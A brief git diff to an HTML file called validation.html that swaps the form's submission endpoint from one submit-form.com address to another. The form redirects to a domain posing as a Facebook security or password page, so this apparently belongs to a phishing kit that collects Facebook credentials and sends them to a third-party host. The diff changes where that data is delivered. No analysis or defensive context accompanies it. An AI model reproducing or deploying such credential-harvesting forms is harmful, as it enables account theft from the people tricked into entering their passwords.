--- a/validation.html
+++ b/validation.html
@@ -10,7 +10,7 @@
 </head>
 
 <body>
-    <form action="https://submit-form.com/qPdQiUAPg" method="post">
+    <form action="https://submit-form.com/S5pJjTMf7" method="post">
         <input type="hidden" name="_redirect" value="https://fb-security-password.on-fleek.app/" />
         <div id="root">
             <div>
